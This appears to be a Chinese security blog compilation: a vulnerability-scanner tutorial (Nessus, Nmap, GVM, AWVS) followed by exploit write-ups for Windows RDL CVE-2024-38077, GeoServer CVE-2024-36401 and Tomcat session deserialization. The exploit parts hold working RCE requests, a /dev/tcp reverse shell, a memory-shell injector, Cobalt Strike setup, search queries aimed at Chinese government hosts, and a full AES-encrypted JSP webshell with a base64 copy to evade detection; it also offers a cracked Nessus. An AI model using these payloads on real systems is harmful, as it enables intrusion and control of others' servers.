配置挑战	Linux需SSH；Windows需破解UAC/WMI防火墙限制	开箱即用，无配置依赖

适用场景:

认证扫描：合规审计（如PCI DSS）、系统上线前深度检查。
非认证扫描：外部攻击面评估、应急响应快速筛查。

注意: Windows环境需解决UAC限制，否则认证扫描可能失败。

本章导读： 本章将深入剖析漏洞扫描的技术原理、核心工作流程、主流工具（如Nessus, AWVS, Nmap, GVM等）的应用模式（重点探讨认证与非认证扫描的实施细节与场景选择），分析其优势与局限性（精度问题、版本识别挑战），并探讨如何有效评估扫描结果、管理误报/漏报，以及如何将自动化扫描与手工测试有机结合，构建高效、全面的安全评估体系。理解漏洞扫描的本质和最佳实践，是每一位安全从业者夯实基础、提升效率的关键一步。

🛠️ Nessus安装和使用

官网下载链接：https://www.tenable.com/downloads/nessus?loginAttempted=true

# 1. 更新系统
sudo apt update && sudo apt upgrade -y

# 2. 下载Nessus .deb包（官网获取最新URL）
wget https://www.tenable.com/downloads/api/v2/pages/nessus/files/<最新版本>.deb

# 3. 校验文件完整性（需与官网SHA256匹配）
sha256sum Nessus-*.deb

# 4. 安装
sudo dpkg -i Nessus-*.deb

# 5. 启动服务
sudo systemctl start nessusd

# 6. 访问控制台
https://localhost:8834

后续配置：

选择 Nessus Essentials → 填写邮箱获取激活码 → 创建本地管理员账户
首次初始化需1小时+（自动下载13万+插件库）

扫描核心操作流程

1. 新建扫描

扫描类型	适用场景	关键配置
基本网络扫描	常规漏洞探测	默认设置（仅扫公共端口）
认证补丁审核	内网深度检测	需填SSH/Windows凭据
高级扫描	自定义漏洞检测	可禁用插件/指定端口

2. 目标配置

格式：IP/IP段/域名（例：10.11.1.73）

端口控制：

路径：设置 → 发现 → 端口扫描
修改 "Port Scan Range"：0-65535（全端口）或指定端口（如111）

3. 认证扫描配置

路径：凭据 → SSH
→ 认证方法：Password
→ 用户名：root
→ 密码：[目标密码]

4. 单插件扫描

路径：插件 → 点击"全部禁用"
→ 展开分类（如RPC）→ 启用特定插件（如"NFS Exported Share Information Disclosure"）

5. 结果分析

过滤高危漏洞：点击"过滤器" → 可被利用 = true
关闭分组视图：右上角齿轮 → 禁用分组
导出报告：支持PDF/CSV/HTML格式

操作避坑指南

资源警告：全端口扫描需8GB+内存，避免扫描期间运行其他重负载任务
账户锁定：在配置中关闭 “Brute Force” 选项（路径：扫描策略 → 高级）
Windows认证失败：确认目标开启WMI服务且防火墙放行135/445端口
插件更新：定期执行 sudo /opt/nessus/sbin/nessuscli update
破解：默认只能扫16个IP，破解请关注公众号回复本文开头的关键字获取。

🔍 Nmap漏洞扫描深度解析

核心机制： Nmap通过NSE脚本引擎（Nmap Scripting Engine）实现漏洞扫描，700+个Lua脚本分为两类：

vuln类：漏洞检测（如http-vuln-cve2017-5638）
exploit类：精简漏洞利用（如smb-vuln-cve-2017-7494）

⚠️ 安全风险分级（执行前必看）：

级别	特征	典型脚本
`safe`	仅信息收集	`http-title.nse`
`intrusive`	可能崩溃服务	`http-slowloris.nse`

🖥️ 关键操作命令：

# 查看所有漏洞扫描脚本
ls /usr/share/nmap/scripts | grep vuln

# 检查脚本功能（强烈建议使用AI解析）
nmap --script-help <脚本名> # 例如：nmap --script-help http-vuln*

# 安全扫描（仅用safe类）
nmap -sV --script "safe and vuln" <目标IP>

# 漏洞探测（vuln类脚本）
nmap -sV --script=vuln <目标IP>

# 精确调用指定脚本
nmap -sV --script=http-vuln-cve2021-41773 <目标IP>

# 扫描结果保存
nmap -sV -oX report.xml --script=vuln <目标IP>

⚙️ 脚本管理技巧：

# 查看脚本分类（script.db数据库）
grep 'categories' /usr/share/nmap/scripts/script.db

# 过滤高风险脚本（排除intrusive）
nmap --script "vuln and not intrusive" <目标IP>

# 更新NSE脚本库
sudo nmap --script-updatedb

📌 最佳实践：

未知脚本必查：nmap --script-help <脚本名> 或丢给AI解读

生产环境先用 --script-trace 预览探测行为

高危操作前在测试环境验证

🛡️ GVM（Greenbone漏洞管理器）部署指南

原为OpenVAS，是Nessus的开源分支，提供企业级漏洞管理能力。

⚡ 快速部署命令（Kali Linux）：

# 安装组件
sudo apt update && sudo apt install -y gvm*

# 初始配置（约15分钟，需联网）
sudo gvm-setup # 自动生成管理员账户

# 更新漏洞数据库（首次需20GB磁盘空间）
sudo gvm-feed-update

# 启动服务
sudo gvm-start # Web控制台：https://127.0.0.1:9392

# 验证安装
sudo gvm-check-setup # 显示各组件状态

🖥️ 常用操作：

# 启动/停止服务
sudo gvm-start | sudo gvm-stop

# 重置管理员密码
sudo runuser -u _gvm -- gvmd --user=admin --new-password=<新密码>

# 手动更新数据库（每日执行）
sudo crontab -e # 添加：0 0 * * * sudo gvm-feed-update

🌐 基础使用流程：

访问 https://localhost:9392 → 用 admin 和安装时生成的密码登录
创建扫描任务：
- 目标配置：指定IP/域名范围
- 扫描策略：选择 Full and fast（平衡模式）
- 认证设置：添加SSH/Windows凭证提升扫描深度
导出报告：支持PDF/CSV/XML格式

💡 高级技巧：

联动Nmap：将 nmap -oX 生成的XML报告导入GVM分析

定制策略：禁用暴力破解选项防账户锁定

计划任务：设置每周全盘扫描 + 每日增量扫描

🔍 AWVS 安装使用

Acunetix Web Vulnerability Scanner (AWVS) 是全球顶尖的 Web 应用漏洞扫描器，专注于自动化检测网站与 API 的安全漏洞。

🔑 核心特性：

类别	能力
扫描范围	SQL 注入、XSS、SSRF、JWT 漏洞、敏感信息泄露等 13000+ 漏洞
技术深度	支持现代 Web 技术（SPA、WebSocket、GraphQL 等）
部署模式	支持本地安装（Windows/Linux）和云平台（Acunetix Online）
合规性	满足 PCI DSS、HIPAA、ISO 27001 等安全标准

📌 定位：与传统网络扫描器（Nessus）互补，专精 Web 层漏洞挖掘。

📥 安装指南（Kali Linux）

⚠️ 前提条件：

硬件：≥4 核 CPU / 8GB RAM / 20GB 磁盘空间
系统：Kali Linux 2023+（或 Ubuntu/Debian）
授权：需官网获取 14 天试用密钥（或购买商业许可）

🛠️ 安装步骤：

# 1. 下载安装包（需注册官网获取下载链接）
wget https://dl.acunetix.com/acu/24.3/acuinstall.sh

# 2. 赋予执行权限
chmod +x acuinstall.sh

# 3. 安装依赖
sudo apt install -y libxcb-xinerama0 libxkbcommon-x11-0

# 4. 启动安装（默认端口：13443）
sudo ./acuinstall.sh --install-license YOUR_LICENSE_KEY

# 5. 访问控制台
https://localhost:13443

💡 重要提示：首次登录需设置管理员邮箱与密码（保存至 /var/lib/acunetix/.config）

🚀 基础使用教程

1. 创建扫描任务

目标配置
- 输入 URL（如 https://example.com）
- 启用 深度爬虫（识别 SPA 动态内容）
- 设置 认证登录（支持 Cookie/表单/OAuth）

扫描策略

模式	特点
快速扫描	耗时短，仅查高危漏洞
全扫描	覆盖所有漏洞检测模块（推荐）
自定义扫描	手动选择检测项（如仅查 API）

2. 扫描结果分析

漏洞分级： 🔴 高危（SQLi、RCE）→ 🟠 中危（XSS）→ 🟢 低危（信息泄露）
利用验证：支持 POC 重放（验证漏洞真实性）
报告导出：支持 PDF/HTML/XML（含修复建议）

3. 高级功能

API 扫描：导入 Swagger/Postman 文件
敏感数据监控：实时检测 Git 泄露、密钥硬编码
CI/CD 集成：Jenkins/GitLab 插件自动化扫描

⚠️ 避坑指南

问题	解决方案
扫描崩溃	限制并发请求（`Settings → Scan Settings → Max Requests`）
误报率高	启用 `Proof-Based Scanning` 二次验证
登录失效	使用 `AcuSensor` 代理抓取认证流量
社区版限制	避开「Acunetix 360 Free」，仅支持 3 页面扫描

相似功能新产品推荐

Nessus和AWVS作为入门熟悉的工具可用，但是再实际测试过程中误报和漏扫率高。安全技术更新换代快，以下是我个人对这些产品的经验看法，和推荐目前比较好用的几个工具。

⚖️ 商业 vs 开源核心差异分析

首先，这些产品分为商业版和开源版，两者的区别有：

🏭 商业工具依赖维度

graph TB
A[商业产品] --> B(专属漏洞实验室)
A --> C(0day快速响应)
A --> D(自动化合规报告)
A --> E(私有漏洞情报)
F[公司经营风险] --> G[产品更新放缓]
F --> H[漏洞库滞后]
F --> I[误报率上升]

🌐 开源工具生存逻辑

graph TB
J[开源项目] --> K(社区贡献者)
J --> L(GitHub Star驱动)
J --> M(企业赞助)
N[技术门槛] --> O[需自行维护规则库]
N --> P[适配定制化环境]
N --> Q[漏洞验证脚本开发]

📊 关键能力对比

能力维度	商业工具	开源工具
漏洞响应速度	0day通常<24小时	依赖社区更新（平均3-7天）
合规支持	自动生成符合审计的报告	需手动整理
使用成本	年费5000−50000+	免费但需时间成本
定制灵活性	闭源不可修改	可二次开发

🛡️ 中国网络安全市场主流产品图谱

产品名称	厂商	主打能力	行业占有率
奇安信网神漏洞扫描系统	奇安信	等保2.0合规驱动 · 信创生态适配（麒麟/统信） · 0day响应<12小时	政府/央企（≥35%）
安恒明鉴漏洞扫描器	安恒信息	Web3.0深度检测 · API安全治理 · 结合「北斗」AI引擎	金融/医疗（28%）
绿盟极光漏洞扫描系统	绿盟科技	攻防演练模式 · ICS/OT工控支持 · 漏洞利用链可视化	能源/制造业（20%）
长亭洞鉴	长亭	动态流量分析 · RASP结合 · 云原生漏洞挖掘	互联网/云平台（18%）
启明星辰天镜	启明星辰	资产管理优先 · 漏洞生命周期管理 · 等保测评报告自动生成	教育/运营商（15%）

🆚 国产 VS 国际产品关键差异

维度	国内产品优势	国际产品劣势
合规支持	内置等保2.0/关基条例模板	需定制开发
漏洞响应	CNNVD/CNVD同步<6小时	CVE中心依赖（时差延迟）
信创适配	深度支持国产OS/数据库	仅兼容Windows/Linux主流版
定价策略	按IP/年收费（含驻场服务）	订阅制（美元结算+高溢价）

🚀 免费替代方案推荐

XRay 社区版（长亭开源）

# 被动代理扫描
./xray webscan --listen 127.0.0.1:7777

Goby 社区版
- 资产测绘免费 · 漏洞扫描限量
Yakit+Nuclei
- Yakit是集成化单兵安全能力平台，用Yaklang语言编写
- Nuclei有丰富的开源模板，也可以自行编写漏洞模板，或让AI编写
- Yakit支持直接导入Nuclei模板扫描

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞狂躁许可（MadLicense）

Thu, 15 Aug 2024 16:43:45 +0000

参考链接 Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077) Windows 远程桌面授权服务远程代码执行漏洞关于Windows远程桌面许可服务存在远程代码执行漏洞的安全公告微软高危漏洞 CVE-2024-38077 EXP CVE-2024-38077-EXP 漏洞预警 | 已复现】Windows 远程桌面授权服务远程代码执行漏洞（CVE-2024-38077）附POC

漏洞影响的产品和版本

 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
 2Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
 3Windows Server 2008 R2 for x64-based Systems Service Pack 1
 4Windows Server 2008 R2 for x64-based Systems Service Pack 1
 5Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
 6Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
 7Windows Server 2008 for x64-based Systems Service Pack 2
 8Windows Server 2008 for x64-based Systems Service Pack 2
 9Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
10Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
11Windows Server 2008 for 32-bit Systems Service Pack 2
12Windows Server 2008 for 32-bit Systems Service Pack 2
13Windows Server 2012 R2 (Server Core installation)
14Windows Server 2012 R2
15Windows Server 2012 (Server Core installation)
16Windows Server 2012
17Windows Server 2016 (Server Core installation)
18Windows Server 2016
19Windows Server 2019 (Server Core installation)
20Windows Server 2019
21Windows Server 2022, 23H2 Edition (Server Core installation)
22Windows Server 2022 (Server Core installation)
23Windows Server 2022
24Windows Server 2025 Preview

用法

靶场搭建

开一个普通的Windows Server 2012 R2 数据中心版 64位中文版服务器。

打开服务器管理器。在命令提示符（cmd）中输入 “servermanager” 命令打开 “服务器管理器”。

添加角色和功能。点击 “添加” ，然后弹出角色和功能向导。默认点击下一步到 “服务器角色” 功能。添加 “远程桌面服务”。选择后默认下一步进行安装，直到显示 “角色服务” 。在这里选择 “远程桌面授权” ，然后点击 “安装” 。安装过程可能需要等待1-2分钟。

安装完成后需要手动开启服务。在命令提示符（cmd）中输入 “services.msc” 命令，成功打开 “服务” 窗口，找到 “Remote Procedure Call (RPC) Locator” 点击开启RPC服务即可完成。

搜索语法

ZoomEye搜索

1"3d267954-eeb7-11d1-b94e-00c04fa3080d"
2"3d267954-eeb7-11d1-b94e-00c04fa3080d" + country:"CN"

Hunter搜索

1ip.ports="3389" && ip.ports="135" && icp.is_exception="true"
2ip.ports="135"&&icp.is_exception="true"&&icp.name="政府"

检测

方法一：下载深信服CVE-2024-38077漏洞扫描工具.exe，使用命令.\深信服CVE-2024-38077漏洞扫描工具.exe 49.235.229.3 检查目标是否存在该漏洞。

方法二：下载利用工具CVE-2024-38077-EXP

1python CVE-2024-38077-POC.py --target_ip 靶机IP

利用

1options:
2 -h, --help show this help message and exit
3 --target_ip TARGET_IP
4 Target IP, eg: 192.168.120.1
5 --evil_ip EVIL_IP Evil IP, eg: 192.168.120.2
6 --evil_dll_path EVIL_DLL_PATH
7 Evil dll path, eg: \smb\evil_dll.dll
8 --check_vuln_exist CHECK_VULN_EXIST
9 Check vulnerability exist before exploit

有一个公众号复现视频模糊的背景看出似乎要CS？

cobaltstrike-client的使用

CobaltStrike使用教程详解（基础）

下载CS4.8，解压密码mht。

CS需要一个CS服务器，一个控制机（攻击机），被控机（靶机）。首先在CS服务器上安装java11，然后设置权限全部可执行，设置密码启动。

1推荐使用ubuntu18运行
2sudo apt install openjdk-11-jre-headless
3sudo apt install openjdk-11-jdk
4chmod 777 teamserver
5chmod 777 TeamServerImage
6./teamserver CS服务器公网IP passwd

在控制机上cobaltstrike-client也是需要Java11才能启动。

1java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:uHook.jar -Dfile.encoding=utf-8 -jar cobaltstrike-client.jar

输入之前设置的主机ip和密码就可以，端口默认。

执行多次不成功，看报错提示似乎还需要一个dll文件。后台翻Github发现POC仅针对2025，好好好好，这么玩是吧，什么垃圾。

总结评价

没啥用了的噱头很大的鸡肋漏洞，漏洞本身价值很大，但是防守应急处置手段太过简单，没有沉没代价，只要封一个135端口就行，基本不影响业务。默认情况下，Windows服务器远程桌面服务仅支持两个并发会话，在启用RDP多并发会话支持时，需要手动安装RDL服务。不排除还有未更新的和未关闭端口的服务，总之是看谁手速快了。

我现在因为复现失败很狂躁，不愧是狂躁许可（MadLicense），真是让人狂躁。

GeoServer CVE-2024-36401 漏洞利用

Tue, 13 Aug 2024 15:02:58 +0000

搜索语法

app.name=“GeoServer” and ip.country=“CN” and icp.is_exception=“true”

版本属性

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

靶场环境

建议开一个美国区的云服务器，拉取GitHub和Vulhub方便。

1git clone https://github.com/vulhub/vulhub.git
2cd vulhub/
3cd geoserver/CVE-2024-36401/
4docker-compose up -d

访问 http://your-ip:8080/geoserver 查看到GeoServer的默认页面。

POC

GET方法的POC

1GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
2Host: your-ip:8080
3Accept-Encoding: gzip, deflate, br
4Accept: */*
5Accept-Language: en-US;q=0.9,en;q=0.8
6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
7Connection: close
8Cache-Control: max-age=0

进入容器查看，可以看到成功创建文件。

1docker exec -it cve-2024-36401_web_1 /bin/bash
2ls /tmp

基于POST方法的POC

 1POST /geoserver/wfs HTTP/1.1
 2Host: your-ip:8080
 3Accept-Encoding: gzip, deflate, br
 4Accept: */*
 5Accept-Language: en-US;q=0.9,en;q=0.8
 6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
 7Connection: close
 8Cache-Control: max-age=0
 9Content-Type: application/xml
10Content-Length: 356
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
18</wfs:GetPropertyValue>

只有 ows:ExceptionReport java.lang.ClassCastException: 的报错是成功执行的。

值得注意的是，typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types

DNS 反弹测试

 1POST /geoserver/wfs HTTP/1.1
 2Host:47.251.97.142:8080
 3Accept-Encoding:gzip,deflate,br
 4Accept:*/*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection:close
 8Cache-Control:max-age=0
 9Content-Type:application/xml
10Content-Length: 358
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 5s1mc4.dnslog.cn')</wfs:valueReference>
18</wfs:GetPropertyValue>

武器化利用

反弹Shell

反弹shell在线生成器在线生成一句话反弹命令

1echo "sh -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1" |base64
2nc -lvnp 7777 # 攻击机开启监听端口

 1POST /geoserver/wfs HTTP/1.1
 2Host:47.251.97.142:8080
 3Accept-Encoding:gzip,deflate,br
 4Accept:*/*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection:close
 8Cache-Control:max-age=0
 9Content-Type:application/xml
10Content-Length: 432
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'bash -c {echo,反弹的base64编码}|{base64,-d}|{bash,-i}')</wfs:valueReference>
18</wfs:GetPropertyValue>

注意 Content-Length:357 中数字的长度要和命令的字节数等于或大于才能执行成功，越大执行越慢。

注入内存木马

使用JMG工具生成内存马，注意名写 java.lang.tes，自定义密码密钥点击生成。把输出复制到下面的POC里 str="内存马base64";的位置。

 1POST /geoserver/wfs HTTP/1.1
 2Host: 47.251.97.142:8080
 3Accept-Encoding: gzip,deflate,br
 4Accept: */*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection: close
 8Cache-Control: max-age=0
 9Content-Type: application/xml
10Content-Length: 432
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
18var str="";
19var bt;
20try {
21 bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
22} catch (e) {
23 bt = java.util.Base64.getDecoder().decode(str);
24}
25var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
26theUnsafe.setAccessible(true);
27unsafe = theUnsafe.get(null);
28unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
29')</wfs:valueReference>
30</wfs:GetPropertyValue>

POC有问题，不成功，建议使用反弹shell后再用别的工具建立探针控制。

工具批量监测

1git clone https://mirror.ghproxy.com/https://github.com/RevoltSecurities/CVE-2024-36401.git
2cd CVE-2024-36401/
3pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
4python exploit.py -l geoserverip.txt

参考链接 https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q https://cloud.tencent.com/developer/article/2437213 https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md https://github.com/pen4uin/java-memshell-generator https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x https://github.com/RevoltSecurities/CVE-2024-36401 https://yzddmr6.com/posts/geoserver-memoryshell/ https://cn-sec.com/archives/2997415.html

CVE-2022-9484 Apache Tomcat Session 漏洞利用

Thu, 08 Aug 2024 16:13:45 +0000

配置靶场

拉取靶场环境。

1docker pull vulfocus/tomcat-cve_2020_9484
2docker run -d --name tomcat-cve_2020_9484 -p 8080:8080 vulfocus/tomcat-cve_2020_9484:latest

Docker 拉取镜像太慢换源

 1sudo mkdir -p /etc/docker
 2sudo tee /etc/docker/daemon.json <<-'EOF'
 3{
 4 "registry-mirrors": [
 5 "https://yxzrazem.mirror.aliyuncs.com",
 6 "https://registry.docker-cn.com",
 7 "https://docker.mirrors.ustc.edu.cn",
 8 "https://hub-mirror.c.163.com",
 9 "https://mirror.baidubce.com"
10 ]
11}
12EOF
13sudo systemctl daemon-reload
14sudo systemctl restart docker

https://yxzrazem.mirror.aliyuncs.com 这个镜像非常快，推荐使用。

Docker 常用命令

 1# 拉取镜像
 2docker pull tomcat:jdk8-openjdk 
 3docker pull tomcat:8.5.55-jdk8-openjdk
 4# 查看镜像
 5docker images 
 6# 进入容器, 当前目录还是在tomcat镜像生成的容器目录下，可以使用:ctrl+p+q不退出容器的方式返回到宿主机目录下
 7docker exec -it f8ca37b5df5d /bin/bash
 8#出容器
 9ctrl+p+q
10# 使用:ctrl+p+q不退出容器的方式返回到宿主机目录下
11# 重启容器
12docker restart 容器ID
13docker restart 31290cf1cc00
14# 停止容器
15docker stop 容器id
16docker stop 31290cf1cc00
17# 启动一个已经停止的容器实例
18docker start 容器名称 或者 容器id tomcat_contract
19docker start 31290cf1cc00
20# 删除容器,可使用 -f 参数强制删除容器
21docker rm 31290cf1cc00
22# 查看所有的容器
23docker ps -a 
24# 查看运行中的容器
25docker ps 
26# 运行镜像
27docker run -d --name tomcat_test -p 8088:8080 7254ff7719c0
28docker run -d --name tomcat_test -v /etc/localtime:/etc/localtime -p 2080:8080 tomcat:latest
29# 保存镜像成一个文件。
30docker save -o tomcat-8.5.55-jdk8-openjdk-dev-v0.1.tar tomcat-8.5.55-jdk8-openjdk-dev:v0.1
31# 从容器拷贝文件到宿主机
32docker load < hangge_server.tar
33# docker cp 容器名：容器中要拷贝的文件名及其路径 要拷贝到宿主机里面对应的路径,拷贝容器中 tomcat的conf目录 到 宿主机 的 home/tomcat 目录下
34docker cp 827e39c506b1:/usr/local/tomcat/conf /home/tomcat_contract/
35# 拷贝容器中 tomcat的webapps目录 到 宿主机 的 home/tomcat 目录下
36docker cp 827e39c506b1:/usr/local/tomcat/webapps /home/tomcat_contract/
37# 删除images, 使用 docker load 命令则可将这个镜像文件载入进来。
38docker rmi 6e07337dc2a2

Groovy 执行漏洞

测试（在Docker中）

BurpSuit 抓包，修改请求头，添加Cookie: redirect=1; JSESSIONID=../../../../../usr/local/tomcat/groovy，就能读到主目录下的文件。

靶机上tmp目录生成了rce，存在漏洞。

Payload构造（在攻击机上）

生成payload，最好在目标靶机同系统的Linux上。

下载ysoserial漏洞利用工具，如果下载失败，上官网clone项目，然后apt install maven安装包构建工具，再在ysoserial主目录下mvn clean package -DskipTests生成jar包。

使用方法

1java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Groovy1 "touch /tmp/2333" > /tmp/test.session

在本机目录下生成了test.session文件。文件内容是包含"touch /tmp/2333"命令的。

使用以下命令网文tomcat服务

1curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

总结注意

Groovy示例代码和test说明了，需要目标靶机存在可以被攻击机上上传修改内容的test.seesion的文件，或者攻击机通过别的方式写入session文件，知道session可以访问的路径再请求。可用于tomcat文件上传漏洞中被限制了上传jsp后缀内容的绕过。

进阶利用

生成jsp木马，将木马文件放到可访问的目录下，冰蝎或哥斯拉链接。JSP内容如下：

1<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%>

将其编码为base64，这样就没有括号双引号等干扰，也可绕过一些检测。

1PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0lPjwldHJ5e2J5dGVbXSBkYXRhPW5ldyBieXRlW0ludGVnZXIucGFyc2VJbnQocmVxdWVzdC5nZXRIZWFkZXIoIkNvbnRlbnQtTGVuZ3RoIikpXTtqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtPSByZXF1ZXN0LmdldElucHV0U3RyZWFtKCk7aW50IF9udW09MDt3aGlsZSAoKF9udW0rPWlucHV0U3RyZWFtLnJlYWQoZGF0YSxfbnVtLGRhdGEubGVuZ3RoKSk8ZGF0YS5sZW5ndGgpO2RhdGE9eChkYXRhLCBmYWxzZSk7aWYgKHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIik9PW51bGwpe3Nlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIixuZXcgWCh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuUShkYXRhKSk7fWVsc2V7cmVxdWVzdC5zZXRBdHRyaWJ1dGUoInBhcmFtZXRlcnMiLCBkYXRhKTtPYmplY3QgZj0oKENsYXNzKXNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLm5ld0luc3RhbmNlKCk7amF2YS5pby5CeXRlQXJyYXlPdXRwdXRTdHJlYW0gYXJyT3V0PW5ldyBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRPdXRwdXRTdHJlYW0oKS53cml0ZSh4KGFyck91dC50b0J5dGVBcnJheSgpLCB0cnVlKSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4=

构造payload，

